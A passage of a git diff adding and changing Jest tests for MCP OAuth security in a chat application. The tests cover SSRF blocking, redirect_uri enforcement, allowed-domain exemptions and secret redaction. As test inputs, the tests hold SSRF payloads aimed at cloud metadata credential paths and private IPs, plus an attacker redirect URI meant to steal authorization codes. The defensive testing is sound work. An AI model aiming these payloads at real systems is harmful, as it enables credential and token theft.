describe('ConnectionsRepository', () => { 
expect(await repository.has('oauthDisabledServer')).toBe(false); }); + it('should NOT allow connection to servers with customUserVars', async () => { + mockServerConfigs.customVarServer = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + expect(await repository.has('customVarServer')).toBe(false); + }); + + it('should NOT allow connection when customUserVars is defined, even when startup is explicitly true', async () => { + mockServerConfigs.customVarStartupServer = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { TOKEN: '{{USER_TOKEN}}' }, + startup: true, + requiresOAuth: false, + customUserVars: { + USER_TOKEN: { title: 'Token', description: 'Your token' }, + }, + }; + + expect(await repository.has('customVarStartupServer')).toBe(false); + }); + it('should disconnect existing connection when server becomes not allowed', async () => { // Initially setup as regular server mockServerConfigs.changingServer = { @@ -471,6 +505,20 @@ describe('ConnectionsRepository', () => { expect(await repository.has('oauthDisabledServer')).toBe(true); }); + it('should allow connection to servers with customUserVars', async () => { + mockServerConfigs.customVarServer = { + type: 'stdio', + command: 'npx', + args: ['-y', '@test/mcp-stdio-server'], + env: { API_KEY: '{{MY_KEY}}' }, + customUserVars: { + MY_KEY: { title: 'API Key', description: 'Your API key' }, + }, + }; + + expect(await repository.has('customVarServer')).toBe(true); + }); + it('should return null from get() when server config does not exist', async () => { const connection = await repository.get('nonexistent'); expect(connection).toBeNull(); diff --git a/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts b/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts index bceb23b246..23bfa89d56 100644 --- 
a/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts +++ b/packages/api/src/mcp/__tests__/MCPConnectionFactory.test.ts @@ -269,6 +269,7 @@ describe('MCPConnectionFactory', () => { 'user123', {}, undefined, + undefined, ); // initFlow must be awaited BEFORE the redirect to guarantee state is stored diff --git a/packages/api/src/mcp/__tests__/MCPManager.test.ts b/packages/api/src/mcp/__tests__/MCPManager.test.ts index bf63a6af3c..dd1ead0dd9 100644 --- a/packages/api/src/mcp/__tests__/MCPManager.test.ts +++ b/packages/api/src/mcp/__tests__/MCPManager.test.ts @@ -34,6 +34,7 @@ const mockRegistryInstance = { getAllServerConfigs: jest.fn(), getOAuthServers: jest.fn(), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }; jest.mock('~/mcp/registry/MCPServersRegistry', () => ({ diff --git a/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts b/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts index 8437177c86..f73a5ed3e8 100644 --- a/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts +++ b/packages/api/src/mcp/__tests__/MCPOAuthFlow.test.ts @@ -24,6 +24,13 @@ jest.mock('@librechat/data-schemas', () => ({ decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')), })); +/** Bypass SSRF validation — these tests use real local HTTP servers. 
*/ +jest.mock('~/auth', () => ({ + ...jest.requireActual('~/auth'), + isSSRFTarget: jest.fn(() => false), + resolveHostnameSSRF: jest.fn(async () => false), +})); + describe('MCP OAuth Flow — Real HTTP Server', () => { afterEach(() => { jest.clearAllMocks(); diff --git a/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts b/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts index 85febb3ece..cb6187ab45 100644 --- a/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts +++ b/packages/api/src/mcp/__tests__/MCPOAuthRaceCondition.test.ts @@ -82,6 +82,7 @@ describe('MCP OAuth Race Condition Fixes', () => { .mockReturnValue({ getServerConfig: jest.fn().mockResolvedValue(mockConfig), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }); const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory'); @@ -147,6 +148,7 @@ describe('MCP OAuth Race Condition Fixes', () => { .mockReturnValue({ getServerConfig: jest.fn().mockResolvedValue(mockConfig), shouldEnableSSRFProtection: jest.fn().mockReturnValue(false), + getAllowedDomains: jest.fn().mockReturnValue(null), }); const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory'); diff --git a/packages/api/src/mcp/__tests__/MCPOAuthSecurity.test.ts b/packages/api/src/mcp/__tests__/MCPOAuthSecurity.test.ts new file mode 100644 index 0000000000..a2d0440d42 --- /dev/null +++ b/packages/api/src/mcp/__tests__/MCPOAuthSecurity.test.ts @@ -0,0 +1,442 @@ +/** + * Tests verifying MCP OAuth security hardening: + * + * 1. SSRF via OAuth URLs — validates that the OAuth handler rejects + * token_url, authorization_url, and revocation_endpoint values + * pointing to private/internal addresses. + * + * 2. redirect_uri manipulation — validates that user-supplied redirect_uri + * is ignored in favor of the server-controlled default. + * + * 3. 
allowedDomains SSRF exemption — validates that admin-configured allowedDomains + * exempts trusted domains from SSRF checks, including auto-discovery paths. + */ + +import * as http from 'http'; +import * as net from 'net'; +import { TokenExchangeMethodEnum } from 'librechat-data-provider'; +import type { Socket } from 'net'; +import type { OAuthTestServer } from './helpers/oauthTestServer'; +import { createOAuthMCPServer } from './helpers/oauthTestServer'; +import { MCPOAuthHandler } from '~/mcp/oauth'; + +jest.mock('@librechat/data-schemas', () => ({ + logger: { + info: jest.fn(), + warn: jest.fn(), + error: jest.fn(), + debug: jest.fn(), + }, + encryptV2: jest.fn(async (val: string) => `enc:${val}`), + decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')), +})); + +/** + * Mock only the DNS-dependent resolveHostnameSSRF; keep isSSRFTarget real. + * SSRF tests use literal private IPs (127.0.0.1, 169.254.169.254, 10.0.0.1) + * which are caught by isSSRFTarget before resolveHostnameSSRF is reached. + * This avoids non-deterministic DNS lookups in test execution. + */ +jest.mock('~/auth', () => ({ + ...jest.requireActual('~/auth'), + resolveHostnameSSRF: jest.fn(async () => false), +})); + +function getFreePort(): Promise { + return new Promise((resolve, reject) => { + const srv = net.createServer(); + srv.listen(0, '127.0.0.1', () => { + const addr = srv.address() as net.AddressInfo; + srv.close((err) => (err ? 
reject(err) : resolve(addr.port))); + }); + }); +} + +function trackSockets(httpServer: http.Server): () => Promise { + const sockets = new Set(); + httpServer.on('connection', (socket: Socket) => { + sockets.add(socket); + socket.once('close', () => sockets.delete(socket)); + }); + return () => + new Promise((resolve) => { + for (const socket of sockets) { + socket.destroy(); + } + sockets.clear(); + httpServer.close(() => resolve()); + }); +} + +describe('MCP OAuth SSRF protection', () => { + let oauthServer: OAuthTestServer; + let ssrfTargetServer: http.Server; + let ssrfTargetPort: number; + let ssrfRequestReceived: boolean; + let destroySSRFSockets: () => Promise; + + beforeEach(async () => { + ssrfRequestReceived = false; + + oauthServer = await createOAuthMCPServer({ + tokenTTLMs: 60000, + issueRefreshTokens: true, + }); + + ssrfTargetPort = await getFreePort(); + ssrfTargetServer = http.createServer((_req, res) => { + ssrfRequestReceived = true; + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end( + JSON.stringify({ + access_token: 'ssrf-token', + token_type: 'Bearer', + expires_in: 3600, + }), + ); + }); + destroySSRFSockets = trackSockets(ssrfTargetServer); + await new Promise((resolve) => + ssrfTargetServer.listen(ssrfTargetPort, '127.0.0.1', resolve), + ); + }); + + afterEach(async () => { + try { + await oauthServer.close(); + } finally { + await destroySSRFSockets(); + } + }); + + it('should reject token_url pointing to a private IP (refreshOAuthTokens)', async () => { + const code = await oauthServer.getAuthCode(); + const tokenRes = await fetch(`${oauthServer.url}token`, { + method: 'POST', + headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, + body: `grant_type=authorization_code&code=${code}`, + }); + const initial = (await tokenRes.json()) as { + access_token: string; + refresh_token: string; + }; + + const regRes = await fetch(`${oauthServer.url}register`, { + method: 'POST', + headers: { 'Content-Type': 
'application/json' }, + body: JSON.stringify({ redirect_uris: ['http://localhost/callback'] }), + }); + const clientInfo = (await regRes.json()) as { + client_id: string; + client_secret: string; + }; + + const ssrfTokenUrl = `http://127.0.0.1:${ssrfTargetPort}/latest/meta-data/iam/security-credentials/`; + + await expect( + MCPOAuthHandler.refreshOAuthTokens( + initial.refresh_token, + { + serverName: 'ssrf-test-server', + serverUrl: oauthServer.url, + clientInfo: { + ...clientInfo, + redirect_uris: ['http://localhost/callback'], + }, + }, + {}, + { + token_url: ssrfTokenUrl, + client_id: clientInfo.client_id, + client_secret: clientInfo.client_secret, + token_exchange_method: TokenExchangeMethodEnum.DefaultPost, + }, + ), + ).rejects.toThrow(/targets a blocked address/); + + expect(ssrfRequestReceived).toBe(false); + }); + + it('should reject private authorization_url in initiateOAuthFlow', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'http://169.254.169.254/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'client', + client_secret: 'secret', + }, + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should reject private token_url in initiateOAuthFlow', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'https://auth.example.com/authorize', + token_url: `http://127.0.0.1:${ssrfTargetPort}/token`, + client_id: 'client', + client_secret: 'secret', + }, + ), + ).rejects.toThrow(/targets a blocked address/); + + expect(ssrfRequestReceived).toBe(false); + }); + + it('should reject private revocationEndpoint in revokeOAuthToken', async () => { + await expect( + MCPOAuthHandler.revokeOAuthToken('test-server', 'some-token', 'access', { + serverUrl: 'https://mcp.example.com/', + clientId: 'client', + clientSecret: 
'secret', + revocationEndpoint: 'http://10.0.0.1/revoke', + }), + ).rejects.toThrow(/targets a blocked address/); + }); +}); + +describe('MCP OAuth redirect_uri enforcement', () => { + it('should ignore attacker-supplied redirect_uri and use the server default', async () => { + const attackerRedirectUri = 'https://attacker.example.com/steal-code'; + + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'victim-server', + 'https://mcp.example.com/', + 'victim-user-id', + {}, + { + authorization_url: 'https://auth.example.com/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'attacker-client', + client_secret: 'attacker-secret', + redirect_uri: attackerRedirectUri, + }, + ); + + const authUrl = new URL(result.authorizationUrl); + const expectedRedirectUri = `${process.env.DOMAIN_SERVER || 'http://localhost:3080'}/api/mcp/victim-server/oauth/callback`; + expect(authUrl.searchParams.get('redirect_uri')).toBe(expectedRedirectUri); + expect(authUrl.searchParams.get('redirect_uri')).not.toBe(attackerRedirectUri); + }); +}); + +describe('MCP OAuth allowedDomains SSRF exemption for admin-trusted hosts', () => { + it('should allow private authorization_url when hostname is in allowedDomains', async () => { + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'internal-server', + 'https://speedy-mcp.company.com/', + 'user-1', + {}, + { + authorization_url: 'http://10.0.0.1/authorize', + token_url: 'http://10.0.0.1/token', + client_id: 'client', + client_secret: 'secret', + }, + ['10.0.0.1'], + ); + + expect(result.authorizationUrl).toContain('10.0.0.1/authorize'); + }); + + it('should allow private token_url when hostname matches wildcard allowedDomains', async () => { + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'internal-server', + 'https://speedy-mcp.company.com/', + 'user-1', + {}, + { + authorization_url: 'https://auth.company.internal/authorize', + token_url: 'https://auth.company.internal/token', + client_id: 'client', 
+ client_secret: 'secret', + }, + ['*.company.internal'], + ); + + expect(result.authorizationUrl).toContain('auth.company.internal/authorize'); + }); + + it('should still reject private URLs when allowedDomains does not match', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'http://169.254.169.254/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'client', + client_secret: 'secret', + }, + ['safe.example.com'], + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should still reject when allowedDomains is empty', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'http://10.0.0.1/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'client', + client_secret: 'secret', + }, + [], + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should allow private revocationEndpoint when hostname is in allowedDomains', async () => { + const mockFetch = jest.fn().mockResolvedValue({ + ok: true, + status: 200, + } as Response); + const originalFetch = global.fetch; + global.fetch = mockFetch; + + try { + await MCPOAuthHandler.revokeOAuthToken( + 'internal-server', + 'some-token', + 'access', + { + serverUrl: 'https://internal.corp.net/', + clientId: 'client', + clientSecret: 'secret', + revocationEndpoint: 'http://10.0.0.1/revoke', + }, + {}, + ['10.0.0.1'], + ); + + expect(mockFetch).toHaveBeenCalled(); + } finally { + global.fetch = originalFetch; + } + }); + + it('should allow localhost token_url in refreshOAuthTokens when localhost is in allowedDomains', async () => { + const mockFetch = jest.fn().mockResolvedValue({ + ok: true, + json: async () => ({ + access_token: 'new-access-token', + token_type: 'Bearer', + expires_in: 3600, + }), + } as Response); + const originalFetch = global.fetch; 
+ global.fetch = mockFetch; + + try { + const tokens = await MCPOAuthHandler.refreshOAuthTokens( + 'old-refresh-token', + { + serverName: 'local-server', + serverUrl: 'http://localhost:8080/', + clientInfo: { + client_id: 'client-id', + client_secret: 'client-secret', + redirect_uris: ['http://localhost:3080/callback'], + }, + }, + {}, + { + token_url: 'http://localhost:8080/token', + client_id: 'client-id', + client_secret: 'client-secret', + }, + ['localhost'], + ); + + expect(tokens.access_token).toBe('new-access-token'); + expect(mockFetch).toHaveBeenCalled(); + } finally { + global.fetch = originalFetch; + } + }); + + describe('auto-discovery path with allowedDomains', () => { + let discoveryServer: OAuthTestServer; + + beforeEach(async () => { + discoveryServer = await createOAuthMCPServer({ + tokenTTLMs: 60000, + issueRefreshTokens: true, + }); + }); + + afterEach(async () => { + await discoveryServer.close(); + }); + + it('should allow auto-discovered OAuth endpoints when server IP is in allowedDomains', async () => { + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'discovery-server', + discoveryServer.url, + 'user-1', + {}, + undefined, + ['127.0.0.1'], + ); + + expect(result.authorizationUrl).toContain('127.0.0.1'); + expect(result.flowId).toBeTruthy(); + }); + + it('should reject auto-discovered endpoints when allowedDomains does not cover server IP', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'discovery-server', + discoveryServer.url, + 'user-1', + {}, + undefined, + ['safe.example.com'], + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should allow auto-discovered token_url in refreshOAuthTokens branch 3 (no clientInfo/config)', async () => { + const code = await discoveryServer.getAuthCode(); + const tokenRes = await fetch(`${discoveryServer.url}token`, { + method: 'POST', + headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, + body: `grant_type=authorization_code&code=${code}`, + 
}); + const initial = (await tokenRes.json()) as { + access_token: string; + refresh_token: string; + }; + + const tokens = await MCPOAuthHandler.refreshOAuthTokens( + initial.refresh_token, + { + serverName: 'discovery-refresh-server', + serverUrl: discoveryServer.url, + }, + {}, + undefined, + ['127.0.0.1'], + ); + + expect(tokens.access_token).toBeTruthy(); + }); + }); +}); diff --git a/packages/api/src/mcp/__tests__/handler.test.ts b/packages/api/src/mcp/__tests__/handler.test.ts index 3b68d88e9c..31665ce8f7 100644 --- a/packages/api/src/mcp/__tests__/handler.test.ts +++ b/packages/api/src/mcp/__tests__/handler.test.ts @@ -260,10 +260,6 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { global.fetch = mockFetch; }); - afterEach(() => { - mockFetch.mockClear(); - }); - afterAll(() => { global.fetch = originalFetch; }); @@ -679,6 +675,109 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { 'Token refresh failed: 400 Bad Request - {"error":"invalid_request","error_description":"refresh_token.client_id: Field required"}', ); }); + + describe('stored token endpoint fallback', () => { + it('uses stored token endpoint when discovery fails (stored clientInfo)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + clientInfo: { + client_id: 'test-client-id', + client_secret: 'test-client-secret', + }, + storedTokenEndpoint: 'https://auth.example.com/token', + storedAuthMethods: ['client_secret_basic'], + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + mockFetch.mockResolvedValueOnce({ + ok: true, + json: async () => ({ + access_token: 'new-access-token', + refresh_token: 'new-refresh-token', + expires_in: 3600, + }), + } as Response); + + const result = await MCPOAuthHandler.refreshOAuthTokens( + 'test-refresh-token', + metadata, + {}, + {}, + ); + + expect(mockFetch).toHaveBeenCalledWith( + 'https://auth.example.com/token', + 
expect.objectContaining({ method: 'POST' }), + ); + expect(result.access_token).toBe('new-access-token'); + }); + + it('uses stored token endpoint when discovery fails (auto-discovered)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + storedTokenEndpoint: 'https://auth.example.com/token', + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + mockFetch.mockResolvedValueOnce({ + ok: true, + json: async () => ({ + access_token: 'new-access-token', + expires_in: 3600, + }), + } as Response); + + const result = await MCPOAuthHandler.refreshOAuthTokens( + 'test-refresh-token', + metadata, + {}, + {}, + ); + + const [fetchUrl] = mockFetch.mock.calls[0]; + expect(fetchUrl).toBeInstanceOf(URL); + expect(fetchUrl.toString()).toBe('https://auth.example.com/token'); + expect(result.access_token).toBe('new-access-token'); + }); + + it('still throws when discovery fails and no stored endpoint (stored clientInfo)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + clientInfo: { + client_id: 'test-client-id', + client_secret: 'test-client-secret', + }, + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); + + expect(mockFetch).not.toHaveBeenCalled(); + }); + + it('still throws when discovery fails and no stored endpoint (auto-discovered)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); + + expect(mockFetch).not.toHaveBeenCalled(); + }); + }); 
}); describe('revokeOAuthToken', () => { @@ -1187,10 +1286,6 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { global.fetch = mockFetch; }); - afterEach(() => { - mockFetch.mockClear(); - }); - afterAll(() => { global.fetch = originalFetch; }); @@ -1363,7 +1458,7 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { ); }); - it('should use fallback /token endpoint for refresh when metadata discovery fails', async () => { + it('should throw when metadata discovery fails during refresh (stored clientInfo)', async () => { const metadata = { serverName: 'test-server', serverUrl: 'https://mcp.example.com', @@ -1373,38 +1468,16 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { }, }; - // Mock metadata discovery to return undefined (no .well-known) mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); - // Mock successful token refresh - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ - access_token: 'new-access-token', - refresh_token: 'new-refresh-token', - expires_in: 3600, - }), - } as Response); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); - const result = await MCPOAuthHandler.refreshOAuthTokens( - 'test-refresh-token', - metadata, - {}, - {}, - ); - - // Verify fetch was called with fallback /token endpoint - expect(mockFetch).toHaveBeenCalledWith( - 'https://mcp.example.com/token', - expect.objectContaining({ - method: 'POST', - }), - ); - - expect(result.access_token).toBe('new-access-token'); + expect(mockFetch).not.toHaveBeenCalled(); }); - it('should use fallback auth methods when metadata discovery fails during refresh', async () => { + it('should throw when metadata lacks token endpoint during refresh', async () => { const metadata = { serverName: 'test-server', serverUrl: 'https://mcp.example.com', @@ -1414,30 +1487,51 @@ describe('MCPOAuthHandler 
- Configurable OAuth Metadata', () => { }, }; - // Mock metadata discovery to return undefined + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce({ + issuer: 'https://auth.example.com/', + authorization_endpoint: 'https://auth.example.com/authorize', + response_types_supported: ['code'], + } as AuthorizationServerMetadata); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No token endpoint found in OAuth metadata'); + + expect(mockFetch).not.toHaveBeenCalled(); + }); + + it('should throw for auto-discovered refresh when metadata discovery returns undefined', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + }; + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); - // Mock successful token refresh - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ - access_token: 'new-access-token', - expires_in: 3600, - }), - } as Response); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); - await MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}); + expect(mockFetch).not.toHaveBeenCalled(); + }); - // Verify it uses client_secret_basic (first in fallback auth methods) - const expectedAuth = `Basic ${Buffer.from('test-client-id:test-client-secret').toString('base64')}`; - expect(mockFetch).toHaveBeenCalledWith( - expect.any(String), - expect.objectContaining({ - headers: expect.objectContaining({ - Authorization: expectedAuth, - }), - }), - ); + it('should throw for auto-discovered refresh when metadata has no token_endpoint', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce({ + issuer: 'https://auth.example.com/', + authorization_endpoint: 
'https://auth.example.com/authorize', + response_types_supported: ['code'], + } as AuthorizationServerMetadata); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No token endpoint found in OAuth metadata'); + + expect(mockFetch).not.toHaveBeenCalled(); }); describe('path-based URL origin fallback', () => { @@ -1574,7 +1668,7 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { expect(result.access_token).toBe('new-access-token'); }); - it('falls back to /token when both path and origin discovery fail', async () => { + it('throws when both path and origin discovery return undefined', async () => { const metadata = { serverName: 'sentry', serverUrl: 'https://mcp.sentry.dev/mcp', @@ -1585,36 +1679,19 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { }, }; - // Both path AND origin discovery return undefined mockDiscoverAuthorizationServerMetadata .mockResolvedValueOnce(undefined) .mockResolvedValueOnce(undefined); - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ - access_token: 'new-access-token', - refresh_token: 'new-refresh-token', - expires_in: 3600, - }), - } as Response); - - const result = await MCPOAuthHandler.refreshOAuthTokens( - 'test-refresh-token', - metadata, - {}, - {}, - ); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2); - - // Falls back to /token relative to server URL origin - const [fetchUrl] = mockFetch.mock.calls[0]; - expect(String(fetchUrl)).toBe('https://mcp.sentry.dev/token'); - expect(result.access_token).toBe('new-access-token'); + expect(mockFetch).not.toHaveBeenCalled(); }); - it('does not retry with origin when server URL has no path (root URL)', async () => { + it('throws when root URL discovery returns undefined (no path 
retry)', async () => { const metadata = { serverName: 'test-server', serverUrl: 'https://auth.example.com/', @@ -1624,18 +1701,14 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { }, }; - // Root URL discovery fails — no retry mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ access_token: 'new-token', expires_in: 3600 }), - } as Response); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); - await MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}); - - // Only one discovery attempt for a root URL expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(1); + expect(mockFetch).not.toHaveBeenCalled(); }); it('retries with origin when path-based discovery throws', async () => { diff --git a/packages/api/src/mcp/__tests__/utils.test.ts b/packages/api/src/mcp/__tests__/utils.test.ts index 716a230ebe..e4fb31bdad 100644 --- a/packages/api/src/mcp/__tests__/utils.test.ts +++ b/packages/api/src/mcp/__tests__/utils.test.ts @@ -1,4 +1,5 @@ -import { normalizeServerName } from '../utils'; +import { normalizeServerName, redactServerSecrets, redactAllServerSecrets } from '~/mcp/utils'; +import type { ParsedServerConfig } from '~/mcp/types'; describe('normalizeServerName', () => { it('should not modify server names that already match the pattern', () => { @@ -26,3 +27,201 @@ describe('normalizeServerName', () => { expect(result).toMatch(/^[a-zA-Z0-9_.-]+$/); }); }); + +describe('redactServerSecrets', () => { + it('should strip apiKey.key from admin-sourced keys', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { + source: 'admin', + authorization_type: 'bearer', + key: 'super-secret-api-key', + }, + }; + const redacted = redactServerSecrets(config); + 
expect(redacted.apiKey?.key).toBeUndefined(); + expect(redacted.apiKey?.source).toBe('admin'); + expect(redacted.apiKey?.authorization_type).toBe('bearer'); + }); + + it('should strip oauth.client_secret', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + oauth: { + client_id: 'my-client', + client_secret: 'super-secret-oauth', + scope: 'read', + }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.oauth?.client_secret).toBeUndefined(); + expect(redacted.oauth?.client_id).toBe('my-client'); + expect(redacted.oauth?.scope).toBe('read'); + }); + + it('should strip both apiKey.key and oauth.client_secret simultaneously', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { + source: 'admin', + authorization_type: 'custom', + custom_header: 'X-API-Key', + key: 'secret-key', + }, + oauth: { + client_id: 'cid', + client_secret: 'csecret', + }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.apiKey?.key).toBeUndefined(); + expect(redacted.apiKey?.custom_header).toBe('X-API-Key'); + expect(redacted.oauth?.client_secret).toBeUndefined(); + expect(redacted.oauth?.client_id).toBe('cid'); + }); + + it('should exclude headers from SSE configs', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'SSE Server', + }; + (config as ParsedServerConfig & { headers: Record }).headers = { + Authorization: 'Bearer admin-token-123', + 'X-Custom': 'safe-value', + }; + const redacted = redactServerSecrets(config); + expect((redacted as Record).headers).toBeUndefined(); + expect(redacted.title).toBe('SSE Server'); + }); + + it('should exclude env from stdio configs', () => { + const config: ParsedServerConfig = { + type: 'stdio', + command: 'node', + args: ['server.js'], + env: { DATABASE_URL: 'postgres://admin:password@localhost/db', PATH: '/usr/bin' }, + }; + const redacted = 
redactServerSecrets(config); + expect((redacted as Record).env).toBeUndefined(); + expect((redacted as Record).command).toBeUndefined(); + expect((redacted as Record).args).toBeUndefined(); + }); + + it('should exclude oauth_headers', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + oauth_headers: { Authorization: 'Bearer oauth-admin-token' }, + }; + const redacted = redactServerSecrets(config); + expect((redacted as Record).oauth_headers).toBeUndefined(); + }); + + it('should strip apiKey.key even for user-sourced keys', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { source: 'user', authorization_type: 'bearer', key: 'my-own-key' }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.apiKey?.key).toBeUndefined(); + expect(redacted.apiKey?.source).toBe('user'); + }); + + it('should not mutate the original config', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'secret' }, + oauth: { client_id: 'cid', client_secret: 'csecret' }, + }; + redactServerSecrets(config); + expect(config.apiKey?.key).toBe('secret'); + expect(config.oauth?.client_secret).toBe('csecret'); + }); + + it('should preserve all safe metadata fields', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'My Server', + description: 'A test server', + iconPath: '/icons/test.png', + chatMenu: true, + requiresOAuth: false, + capabilities: '{"tools":{}}', + tools: 'tool_a, tool_b', + dbId: 'abc123', + updatedAt: 1700000000000, + consumeOnly: false, + inspectionFailed: false, + customUserVars: { API_KEY: { title: 'API Key', description: 'Your key' } }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.title).toBe('My Server'); + expect(redacted.description).toBe('A test server'); + 
